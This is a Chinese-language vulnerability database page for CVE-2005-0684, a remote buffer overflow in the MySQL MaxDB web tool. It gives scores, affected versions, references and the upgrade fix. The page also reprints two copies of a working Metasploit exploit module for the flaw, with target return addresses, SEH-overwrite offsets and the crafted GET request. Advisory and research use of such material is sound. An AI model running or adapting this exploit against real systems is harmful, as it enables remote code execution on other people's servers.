CVE-2005-0684
CVSS10.0
发布时间 :2005-04-25 00:00:00
修订时间 :2011-03-07 21:20:26
NMCOEPS    

[原文]Multiple buffer overflows in the web tool for MySQL MaxDB before 7.5.00.26 allows remote attackers to execute arbitrary code via (1) an HTTP GET request with a long file parameter after a percent ("%") sign or (2) a long Lock-Token string to the WebDAV functionality, which is not properly handled by the getLockTokenHeader function in WDVHandler_CommonUtils.c.


[CNNVD]MySQL MaxDB HTTP GET请求远程缓冲区溢出漏洞(CNNVD-200504-094)

        MySQL的MaxDB是SAP AG开放源码数据库SAP DB的增强版本,是对MySQL数据库服务器的补充。
        MaxDB处理HTTP界面上的请求时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在系统上执行任意指令。
        漏洞起因是没能正确地处理包含有百分号(%)的HTTP GET请求。如果攻击者能够发布指定了百分号的HTTP GET请求,而请求后有超长字符串做为文件参数,就可能发生栈溢出。攻击者必须发送大约4000字节的长度才能覆盖进程SEH。攻击者还可能覆盖程序保存的指令指针。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:mysql:maxdb:7.5.00.12MySQL MaxDB 7.5.00.12
cpe:/a:mysql:maxdb:7.5.00.08MySQL MaxDB 7.5.00.08
cpe:/a:mysql:maxdb:7.5.00.18MySQL MaxDB 7.5.00.18
cpe:/a:mysql:maxdb:7.5.00.19MySQL MaxDB 7.5.00.19
cpe:/a:mysql:maxdb:7.5.00.15MySQL MaxDB 7.5.00.15
cpe:/a:mysql:maxdb:7.5.00MySQL MaxDB 7.5.00
cpe:/a:mysql:maxdb:7.5.00.14MySQL MaxDB 7.5.00.14
cpe:/a:mysql:maxdb:7.5.00.23MySQL MaxDB 7.5.00.23
cpe:/a:mysql:maxdb:7.5.00.16MySQL MaxDB 7.5.00.16
cpe:/a:mysql:maxdb:7.5.00.11MySQL MaxDB 7.5.00.11

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0684
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0684
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200504-094
(官方数据源) CNNVD

- 其它链接及资源

http://www.idefense.com/application/poi/display?id=235&type=vulnerabilities
(VENDOR_ADVISORY)  IDEFENSE  20050425 MySQL MaxDB Webtool Remote Lock-Token Stack Overflow Vulnerability
http://www.idefense.com/application/poi/display?id=234&type=vulnerabilities
(VENDOR_ADVISORY)  IDEFENSE  20050425 MySQL MaxDB Webtool Remote Stack Overflow Vulnerability
http://dev.mysql.com/doc/maxdb/changes/changes_7.5.00.26.html#WebDAV
(VENDOR_ADVISORY)  CONFIRM  http://dev.mysql.com/doc/maxdb/changes/changes_7.5.00.26.html#WebDAV
http://www.securityfocus.com/bid/13368
(UNKNOWN)  BID  13368

- 漏洞信息

MySQL MaxDB HTTP GET请求远程缓冲区溢出漏洞
危急 缓冲区溢出
2005-04-25 00:00:00 2006-03-28 00:00:00
远程  
        MySQL的MaxDB是SAP AG开放源码数据库SAP DB的增强版本,是对MySQL数据库服务器的补充。
        MaxDB处理HTTP界面上的请求时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在系统上执行任意指令。
        漏洞起因是没能正确地处理包含有百分号(%)的HTTP GET请求。如果攻击者能够发布指定了百分号的HTTP GET请求,而请求后有超长字符串做为文件参数,就可能发生栈溢出。攻击者必须发送大约4000字节的长度才能覆盖进程SEH。攻击者还可能覆盖程序保存的指令指针。

- 公告与补丁

        暂无数据

- 漏洞信息 (16791)

MaxDB WebDBM GET Buffer Overflow (EDBID:16791)
windows remote
2010-05-09 Verified
9999 metasploit
N/A [点击下载]
##
# $Id: maxdb_webdbm_get_overflow.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'MaxDB WebDBM GET Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the MaxDB WebDBM
				service. This service is included with many recent versions
				of the MaxDB and SAPDB products. This particular module is
				capable of exploiting Windows systems through the use of an
				SEH frame overwrite. The offset to the SEH frame may change
				depending on where MaxDB has been installed, this module
				assumes a web root path with the same length as:

				C:\Program Files\sdb\programs\web\Documents
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2005-0684'],
					[ 'OSVDB', '15816'],
					[ 'URL', 'http://www.idefense.com/application/poi/display?id=234&type=vulnerabilities'],
					[ 'BID', '13368'],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 2052,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x40",
					'StackAdjustment' => -3500,
				},
				'Platform'   => 'win',
			'Targets'        =>
				[
					['MaxDB 7.5.00.11 / 7.5.00.24', { 'Ret' => 0x1002aa19 }], # wapi.dll
					['Windows 2000 English',        { 'Ret' => 0x75022ac4 }], # ws2help.dll
					['Windows XP English SP0/SP1',  { 'Ret' => 0x71aa32ad }], # ws2help.dll
					['Windows 2003 English',        { 'Ret' => 0x7ffc0638 }], # peb magic :-)
					['Windows NT 4.0 SP4/SP5/SP6',  { 'Ret' => 0x77681799 }], # ws2help.dll
				],
			'DisclosureDate' => 'Apr 26 2005',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(9999)
			], self.class)
	end

	def exploit
		# Trigger the SEH by writing past the end of the page after
		# the SEH is already overwritten. This avoids the other smashed
		# pointer exceptions and goes straight to the payload.
		buf = rand_text_alphanumeric(16384)
		buf[1586, payload.encoded.length] = payload.encoded
		buf[3638, 5] = "\xe9" + [-2052].pack('V')
		buf[3643, 2] = "\xeb\xf9"
		buf[3647, 4] = [target.ret].pack('V')

		print_status("Trying target address 0x%.8x..." % target.ret)

		send_request_raw({
			'uri' => '/%' + buf
		}, 5)

		handler
	end

end
		

- 漏洞信息 (F83068)

MaxDB WebDBM GET Buffer Overflow (PacketStormID:F83068)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit,web,overflow,root
windows
CVE-2005-0684
[点击下载]

This Metasploit module exploits a stack overflow in the MaxDB WebDBM service. This service is included with many recent versions of the MaxDB and SAPDB products. This particular module is capable of exploiting Windows systems through the use of an SEH frame overwrite. The offset to the SEH frame may change depending on where MaxDB has been installed, this module assumes a web root path with the same length as: C:\\Program Files\\sdb\\programs\\web\\Documents

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'MaxDB WebDBM GET Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in the MaxDB WebDBM
				service. This service is included with many recent versions
				of the MaxDB and SAPDB products. This particular module is
				capable of exploiting Windows systems through the use of an
				SEH frame overwrite. The offset to the SEH frame may change
				depending on where MaxDB has been installed, this module
				assumes a web root path with the same length as:

				C:\Program Files\sdb\programs\web\Documents
					
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-0684'],
				    	[ 'OSVDB', '15816'],
					[ 'URL', 'http://www.idefense.com/application/poi/display?id=234&type=vulnerabilities'],
					[ 'BID', '13368'],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 2052,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x40",
					'StackAdjustment' => -3500,

				},
				'Platform'   => 'win',
			'Targets'        => 
				[
					['MaxDB 7.5.00.11 / 7.5.00.24', { 'Ret' => 0x1002aa19 }], # wapi.dll
					['Windows 2000 English',        { 'Ret' => 0x75022ac4 }], # ws2help.dll
					['Windows XP English SP0/SP1',  { 'Ret' => 0x71aa32ad }], # ws2help.dll
					['Windows 2003 English',        { 'Ret' => 0x7ffc0638 }], # peb magic :-)
					['Windows NT 4.0 SP4/SP5/SP6',  { 'Ret' => 0x77681799 }], # ws2help.dll
				],
			'DisclosureDate' => 'Apr 26 2005',
			'DefaultTarget' => 0))
			
			register_options(
				[
					Opt::RPORT(9999)
				], self.class)			
	end

	def exploit
		# Trigger the SEH by writing past the end of the page after
		# the SEH is already overwritten. This avoids the other smashed
		# pointer exceptions and goes straight to the payload.
		buf = rand_text_alphanumeric(16384)
		buf[1586, payload.encoded.length] = payload.encoded
		buf[3638, 5] = "\xe9" + [-2052].pack('V')
		buf[3643, 2] = "\xeb\xf9"
		buf[3647, 4] = [target.ret].pack('V')

		print_status("Trying target address 0x%.8x..." % target.ret)
		
		send_request_raw({
			'uri' => '/%' + buf
		}, 5)

		handler
	end

end
    

- 漏洞信息

15816
MySQL MaxDB Web Administration Service Malformed GET Request Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public, Exploit Private, Exploit Commercial Vendor Verified

- 漏洞描述

A remote overflow exists in MySQL MaxDB. The MaxDB web administration service fails to properly handle HTTP GET requests containing a percent sign ('%') resulting in a buffer overflow. With a specially crafted HTTP GET request containing a percent sign followed by an overly long string as the file parameter, a remote attacker can cause arbitrary code execution with SYSTEM privileges resulting in a loss of integrity.

- 时间线

2005-04-25 2005-03-08
2005-04-27 2005-04-25

- 解决方案

Upgrade to version 7.5.00.26 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

MySQL MaxDB WebDAV Lock Token Remote Buffer Overflow Vulnerability
Boundary Condition Error 13369
Yes No
2005-04-26 12:00:00 2009-07-12 02:06:00
The discoverer of this vulnerability wishes to remain anonymous.

- 受影响的程序版本

MySQL AB MaxDB 7.5 .00.25
MySQL AB MaxDB 7.5 .00.24
MySQL AB MaxDB 7.5 .00.23
MySQL AB MaxDB 7.5 .00.19
MySQL AB MaxDB 7.5 .00.18
MySQL AB MaxDB 7.5 .00.16
MySQL AB MaxDB 7.5 .00.15
MySQL AB MaxDB 7.5 .00.14
MySQL AB MaxDB 7.5 .00.12
MySQL AB MaxDB 7.5 .00.11
MySQL AB MaxDB 7.5 .00.08
MySQL AB MaxDB 7.5 .00
MySQL AB MaxDB 7.5 .00.26

- 不受影响的程序版本

MySQL AB MaxDB 7.5 .00.26

- 漏洞讨论

A remote buffer overflow vulnerability affects MySQL MaxDB. This issue is due to a failure of the application to properly validate the length of user-supplied strings prior to copying them into static process buffers.

An attacker may exploit this issue to execute arbitrary code with the privileges of the user that activated the vulnerable application. This may facilitate unauthorized access or privilege escalation.

- 漏洞利用

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com &lt;mailto:vuldb@securityfocus.com&gt;.

- 解决方案

The vendor has released an upgrade dealing with this issue.


MySQL AB MaxDB 7.5 .00.18

MySQL AB MaxDB 7.5 .00.08

MySQL AB MaxDB 7.5 .00.25

MySQL AB MaxDB 7.5 .00.12

MySQL AB MaxDB 7.5 .00.16

MySQL AB MaxDB 7.5 .00.23

MySQL AB MaxDB 7.5 .00.19

MySQL AB MaxDB 7.5 .00.24

MySQL AB MaxDB 7.5 .00.14

MySQL AB MaxDB 7.5 .00.11

MySQL AB MaxDB 7.5 .00.15

MySQL AB MaxDB 7.5 .00

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站